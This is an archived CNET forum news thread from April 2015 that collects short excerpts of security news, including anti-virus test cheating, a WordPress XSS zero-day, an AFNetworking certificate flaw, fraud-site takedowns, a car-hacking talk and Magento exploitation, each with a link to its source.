Thank you for being a valued part of the CNET community. As of December 1, 2020, the forums are in read-only format. In early 2021, CNET Forums will no longer be available. We are grateful for the participation and advice you have provided to one another over the years.

Thanks,

CNET Support

Alert

NEWS - April 27, 2015

Apr 27, 2015 4:08AM PDT
Anti-virus product caught cheating by independent testing agency

AV-Comparatives, one of the world's leading independent testers of anti-virus products, says that it has uncovered that at least one product isn't playing by the rules.

'AV-C has uncovered an infringement of the testing agreement by one of the vendors participating in its tests. It has been found that a product submitted for testing by the vendor had been specifically engineered for the major testing labs, including AV-C; public availability of this version was limited. A second vendor is also being investigated for similar reasons. When this analysis is complete, AV-C will announce the measures it will take against the vendor(s) found to be in breach of contract.

Imagine if the security software you or I might get from an anti-virus vendor was different from what AV-Comparatives tested. Frankly, what would be the point of reading the test at all?

Continued : https://grahamcluley.com/2015/04/anti-virus-cheat/

Discussion is locked

- Collapse -
Just-released WordPress 0day makes it easy to hijack ..
Apr 27, 2015 4:17AM PDT
..millions of websites

The WordPress content management system used by millions of websites is vulnerable to two newly discovered threats that allow attackers to take full control of the Web server. Attack code has been released that targets one of the latest versions of WordPress, making it a zero-day exploit that could touch off a series of site hijackings throughout the Internet.

Both vulnerabilities are known as stored, or persistent, cross-site scripting (XSS) bugs. They allow an attacker to inject code into the HTML content received by administrators who maintain the website. Both attacks work by embedding malicious code into the comments section that appear by default at the bottom of a WordPress blog or article post. From there, attackers can change passwords, add new administrators, or take just about any other action legitimate admins can perform. The most serious of the two vulnerabilities is in WordPress version 4.2 because as of press time there is no patch.

Continued : http://arstechnica.com/security/2015/04/27/just-released-wordpress-0day-makes-it-easy-to-hijack-millions-of-websites/

Related:
Details on WordPress Zero Day Disclosed
WordPress Flaw Allows Arbitrary Code Execution via Comments: Researcher
- Collapse -
2nd Crypto Bug in Networking Library Could Affect 25K Apps
Apr 27, 2015 4:18AM PDT

A few weeks after the developers of the AFNetworking library that's popular among iOS and OS X app developers patched a serious bug in the library that enabled man-in-the-middle attacks, another, similar flaw has surfaced.

The new vulnerability is related to how the AFNetworking library handles domain name validation for certificates. As it turns out, the library has a flag set that disables domain validation by default, meaning that an attacker effectively could present any valid certificate to an app affected by the vulnerability, and the app would accept it. Researchers at SourceDNA said that the vulnerability is as serious as they come for a mobile app.

"This meant that a coffee shop attacker could still eavesdrop on private data or grab control of any SSL session between the app and the Internet. Because the domain name wasn't checked, all they needed was a valid SSL certificate for any web server, something you can buy for $50," the company said in a blog post.

Continued : https://threatpost.com/second-crypto-bug-in-networking-library-could-affect-25000-apps/112433

- Collapse -
Taking Down Fraud Sites is Whac-a-Mole
Apr 27, 2015 4:18AM PDT
Brian Krebs @ his "Krebs on Security" blog:

I've been doing quite a bit of public speaking lately — usually about cybercrime and underground activity — and there's one question that nearly always comes from the audience: "Why are these fraud Web sites allowed to operate, and not simply taken down?" This post is intended to serve as the go-to spot for answering that question.

Q: Why not take down the hundreds of sites now selling stolen credit cards and identity data?

For starters, it's not always so easy to take these sites offline. Many of them rely on domain name registrars that routinely ignore abuse requests. The same goes for the organizations hosting a number of these unsavory markets. What's more, most crime shops have a slew of new domain variations at a variety of hosting providers and registrars that they can turn to if they do get shut down.

Continued : http://krebsonsecurity.com/2015/04/taking-down-fraud-sites-is-whac-a-mole/
- Collapse -
Researchers Plan to Demonstrate a Wireless Car Hack
Apr 27, 2015 4:18AM PDT
.. This Summer

At the Black Hat and Defcon security conferences this August, security researchers Charlie Miller and Chris Valasek have announced they plan to wirelessly hack the digital network of a car or truck. That network, known as the CAN bus, is the connected system of computers that influences everything from the vehicle's horn and seat belts to its steering and brakes. And their upcoming public demonstrations may be the most definitive proof yet of cars' vulnerability to remote attacks, the result of more than two years of work since Miller and Valasek first received a DARPA grant to investigate cars' security in 2013.

"We will show the reality of car hacking by demonstrating exactly how a remote attack works against an unaltered, factory vehicle," the hackers write in an abstract of their talk that appeared on the Black Hat website last week. "Starting with remote exploitation, we will show how to pivot through different pieces of the vehicle's hardware in order to be able to send messages on the CAN bus to critical electronic control units. We will conclude by showing several CAN messages that affect physical systems of the vehicle."

Continued : http://www.wired.com/2015/04/researchers-plan-wirelessly-hack-car-public-summer/
- Collapse -
Flaw on eBay's Magento platform lets hackers attack ..
Apr 27, 2015 5:11AM PDT
.. web stores

Those using Magento's e-commerce platform should ensure they're using its latest software, as attackers are increasingly exploiting a flaw patched two months ago, security companies warned.

The vulnerability can allow an attacker to gain complete control over a store with administrator access, potentially allowing credit card theft, wrote Netanel Rubin of Check Point's Malware and Vulnerability Research Group. As many as 200,000 websites use Magento, which is owned by eBay.

Check Point, which found the flaw, reported it to Magento, which issued a patch (SUPEE-5344) on 9 February. Since Check Point revealed the flaw earlier this week, it appears attackers have picked up on it and are trying to find unpatched applications.

Continued :http://www.techworld.com/news/security/hackers-exploit-magento-e-commerce-vulnerability-3609323/

Related:
100,000 web shops open to compromise as attackers exploit Magento bug
Potent, in-the-wild exploits imperil customers of 100,000 e-commerce sites